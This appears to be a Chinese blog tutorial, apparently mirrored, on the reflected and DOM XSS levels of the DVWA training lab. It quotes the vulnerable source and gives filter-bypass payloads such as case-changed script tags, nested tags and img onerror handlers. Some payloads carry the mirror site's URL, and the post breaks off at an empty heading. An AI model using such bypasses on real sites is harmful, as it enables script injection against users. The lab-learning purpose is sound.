DVWA靶场都不陌生,最新学习xss,从新又搞了一遍xss部分,从源码方面康康xss的原因,参考了很多大佬的博客表示感谢,网上也有很多DVWA靶场教程,就水一篇吧。
更多web安全知识欢迎访问:https://lmg66.github.io/-------->防止爬虫
环境配置
官网:
下载地址:https://github.com/ethicalhack3r/DVWA
下载方式:zip下载或git https://github.com/ethicalhack3r/DVWA
下载完成放入http服务下即可
我使用的是phpstudy下载地址:https://m.xp.cn/
反射性xss
级别low
查看源码:
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Feedback for end user
$html .= '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}
?>
分析
name变量没有过滤,直接输出
payload
/vulnerabilities/xss_r/?name=<script>alert('http://www.likecs.com/xss')<%2Fscript>#
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NDI1MDAyNS03NzA0MDM5Ni5wbmc=)
级别:Medium
查看源码
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = str_replace( '<script>', '', $_GET[ 'name' ] );
// Feedback for end user
$html .= "<pre>Hello ${name}</pre>";
}
?>
分析
这里用正则表达过滤
payload
vulnerabilities/xss_r/?name=<Script>alert('http://www.likecs.com/xss')<%2FScript>#
vulnerabilities/xss_r/?name=<img+src%3Dx+onerror%3Dalert('XSS')>#
/vulnerabilities/xss_r/?name=<s<script>cript>alert('XSS')<%2Fscript>#
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NDUxNTg4NS03NDc0NTg4NzcucG5n)
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NDUyMjEzNi0xNzQ1MjI5ODcxLnBuZw==)
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NDUyOTU0MS00OTEwMzg2MjgucG5n)
级别:high
查看源码
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
// Feedback for end user
$html .= "<pre>Hello ${name}</pre>";
}
?>
分析
不区分大小写,而且通配符匹配,嵌套无法使用,可以尝试其他标签触发弹窗
payload
/vulnerabilities/xss_r/?name=<img+src%3D"http://www.likecs.com/xss"+onerror%3Dalert('http://www.likecs.com/xss')>#
级别:impossible
查看源码:
<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$name = htmlspecialchars( $_GET[ 'name' ] );
// Feedback for end user
$html .= "<pre>Hello ${name}</pre>";
}
// Generate Anti-CSRF token
generateSessionToken();
?>
分析
name变量通过htmlspecialchars()函数把预定的字符转为HTML实体,且输入到
标签里,所以占时
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NDgyNDIxNi00NDU0MzEwNjIucG5n)
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NDgzMDY5OC03ODU3MDQ4NTAucG5n)
DOM型xss
级别:low
查看源码:
<div>
<p>Please choose a language:</p>
<form method="GET">
<select>
<script>
if (document.location.href.indexOf("default=") >= 0) {
var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
document.write("<option value='" + lang + "'>" + $decodeURI(lang) + "</option>");
document.write("<option value='' disabled='disabled'>----</option>");
}
document.write("<option value='English'>English</option>");
document.write("<option value='French'>French</option>");
document.write("<option value='Spanish'>Spanish</option>");
document.write("<option value='German'>German</option>");
</script>
</select>
<input type="submit" value="Select" />
</form>
</div>
分析
lang变量通过document.location.href来获取url,并没有过滤就输入到了option标签中
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NTAxMzQyOS0zNTEwODQ3NjMucG5n)
![DVWA(xss部分源码分析)](http://www.likecs.com/default/index/img?u=aHR0cHM6Ly9pbWcyMDIwLmNuYmxvZ3MuY29tL2Jsb2cvMjA5MjY3MS8yMDIwMDcvMjA5MjY3MS0yMDIwMDcxNTE3NTAyMTM4Ny0xODI3NDEwMTkucG5n)
payload